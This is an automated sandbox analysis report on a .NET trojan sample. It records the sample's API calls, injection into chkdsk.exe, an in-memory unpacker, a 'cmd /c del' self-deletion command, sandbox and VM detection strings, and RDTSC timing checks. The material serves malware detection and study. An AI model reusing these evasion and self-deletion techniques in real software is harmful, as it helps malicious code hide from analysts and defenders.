          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4D46610_2_04E4D466
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9841F10_2_04D9841F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E525DD10_2_04E525DD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9D5E010_2_04D9D5E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB258110_2_04DB2581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E51D5510_2_04E51D55
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E52D0710_2_04E52D07
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D80D2010_2_04D80D20
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E52EF710_2_04E52EF7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA6E3010_2_04DA6E30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4D61610_2_04E4D616
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E51FF110_2_04E51FF1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E528EC10_2_04E528EC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9B09010_2_04D9B090
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E520A810_2_04E520A8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A010_2_04DB20A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4100210_2_04E41002
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8F90010_2_04D8F900
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA412010_2_04DA4120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E522AE10_2_04E522AE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4DBD210_2_04E4DBD2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBEBB010_2_04DBEBB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E52B2810_2_04E52B28
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04A98C8010_2_04A98C80
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04A98C7F10_2_04A98C7F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04A92D9010_2_04A92D90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04A92FB010_2_04A92FB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AACF0310_2_04AACF03
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAC8EE10_2_04AAC8EE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAC8F810_2_04AAC8F8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 04D8B150 appears 35 times
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_004185E0 NtCreateFile,3_2_004185E0
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00418690 NtReadFile,3_2_00418690
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00418710 NtClose,3_2_00418710
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_004187C0 NtAllocateVirtualMemory,3_2_004187C0
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_004185DA NtCreateFile,3_2_004185DA
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041870C NtClose,3_2_0041870C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC95D0 NtClose,LdrInitializeThunk,10_2_04DC95D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9540 NtReadFile,LdrInitializeThunk,10_2_04DC9540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC96D0 NtCreateKey,LdrInitializeThunk,10_2_04DC96D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC96E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_04DC96E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9650 NtQueryValueKey,LdrInitializeThunk,10_2_04DC9650
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_04DC9660
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9FE0 NtCreateMutant,LdrInitializeThunk,10_2_04DC9FE0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9780 NtMapViewOfSection,LdrInitializeThunk,10_2_04DC9780
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9710 NtQueryInformationToken,LdrInitializeThunk,10_2_04DC9710
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9840 NtDelayExecution,LdrInitializeThunk,10_2_04DC9840
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9860 NtQuerySystemInformation,LdrInitializeThunk,10_2_04DC9860
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC99A0 NtCreateSection,LdrInitializeThunk,10_2_04DC99A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_04DC9910
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9A50 NtCreateFile,LdrInitializeThunk,10_2_04DC9A50
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC95F0 NtQueryInformationFile,10_2_04DC95F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9560 NtWriteFile,10_2_04DC9560
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DCAD30 NtSetContextThread,10_2_04DCAD30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9520 NtWaitForSingleObject,10_2_04DC9520
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9670 NtQueryInformationProcess,10_2_04DC9670
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9610 NtEnumerateValueKey,10_2_04DC9610
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC97A0 NtUnmapViewOfSection,10_2_04DC97A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DCA770 NtOpenThread,10_2_04DCA770
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9770 NtSetInformationFile,10_2_04DC9770
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9760 NtOpenProcess,10_2_04DC9760
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DCA710 NtOpenProcessToken,10_2_04DCA710
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9730 NtQueryVirtualMemory,10_2_04DC9730
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC98F0 NtReadVirtualMemory,10_2_04DC98F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC98A0 NtWriteVirtualMemory,10_2_04DC98A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DCB040 NtSuspendThread,10_2_04DCB040
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9820 NtEnumerateKey,10_2_04DC9820
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC99D0 NtCreateProcessEx,10_2_04DC99D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9950 NtQueueApcThread,10_2_04DC9950
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9A80 NtOpenDirectoryObject,10_2_04DC9A80
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9A10 NtQuerySection,10_2_04DC9A10
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9A00 NtProtectVirtualMemory,10_2_04DC9A00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9A20 NtResumeThread,10_2_04DC9A20
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DCA3B0 NtGetContextThread,10_2_04DCA3B0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9B00 NtSetValueKey,10_2_04DC9B00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA85E0 NtCreateFile,10_2_04AA85E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA8690 NtReadFile,10_2_04AA8690
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA87C0 NtAllocateVirtualMemory,10_2_04AA87C0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA8710 NtClose,10_2_04AA8710
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA85DA NtCreateFile,10_2_04AA85DA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA870C NtClose,10_2_04AA870C
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345190906.00000000005F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStructuralEqualityCompar.exe2 vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.349469695.0000000007000000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000003.00000000.341708297.0000000000DE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStructuralEqualityCompar.exe2 vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000003.00000002.416179493.00000000019CF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415711074.0000000001696000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exeBinary or memory string: OriginalFilenameStructuralEqualityCompar.exe2 vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: GV8EJooYMIgEnEk.exeVirustotal: Detection: 60%
          Source: GV8EJooYMIgEnEk.exeMetadefender: Detection: 20%
          Source: GV8EJooYMIgEnEk.exeReversingLabs: Detection: 62%
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeFile read: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe:Zone.IdentifierJump to behavior
          Source: GV8EJooYMIgEnEk.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GV8EJooYMIgEnEk.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@7/5
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: GV8EJooYMIgEnEk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: GV8EJooYMIgEnEk.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: GV8EJooYMIgEnEk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: chkdsk.pdbGCTL source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: chkdsk.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: StructuralEqualityCompar.pdb source: GV8EJooYMIgEnEk.exe

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: GV8EJooYMIgEnEk.exe, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.GV8EJooYMIgEnEk.exe.590000.0.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.GV8EJooYMIgEnEk.exe.590000.0.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.3.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.1.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.2.GV8EJooYMIgEnEk.exe.d80000.1.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.2.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.5.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.0.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.9.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.7.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_07164FF9 push es; retf 0_2_0716500D
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_0716C325 push FFFFFF8Bh; iretd 0_2_0716C327
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041B822 push eax; ret 3_2_0041B828
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041B82B push eax; ret 3_2_0041B892
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041B88C push eax; ret 3_2_0041B892
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00419178 push ebp; iretd 3_2_0041917B
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041A10B push edi; retf 3_2_0041A10C
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041A2A7 push ebx; retf 3_2_0041A2AA
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00415C52 pushad ; ret 3_2_00415C5A
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041CCCE push es; iretd 3_2_0041CCD0
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041B7D5 push eax; ret 3_2_0041B828
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DDD0D1 push ecx; ret 10_2_04DDD0E4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AACCCE push es; iretd 10_2_04AACCD0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA5C52 pushad ; ret 10_2_04AA5C5A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAB7D5 push eax; ret 10_2_04AAB828
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAB88C push eax; ret 10_2_04AAB892
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAB82B push eax; ret 10_2_04AAB892
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAB822 push eax; ret 10_2_04AAB828
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAA10B push edi; retf 10_2_04AAA10C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA9178 push ebp; iretd 10_2_04AA917B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAA2A7 push ebx; retf 10_2_04AAA2AA
          Source: initial sampleStatic PE information: section name: .text entropy: 7.78260076892

          Hooking and other Techniques for Hiding and Protection

          barindex
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"Jump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.28fd388.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.2979c1c.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: GV8EJooYMIgEnEk.exe PID: 6024, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000004A98604 second address: 0000000004A9860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000004A9899E second address: 0000000004A989A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe TID: 4632Thread sleep time: -35216s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe TID: 5632Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5248Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_004088D0 rdtsc 3_2_004088D0
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeAPI coverage: 9.5 %
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeThread delayed: delay time: 35216Jump to behavior
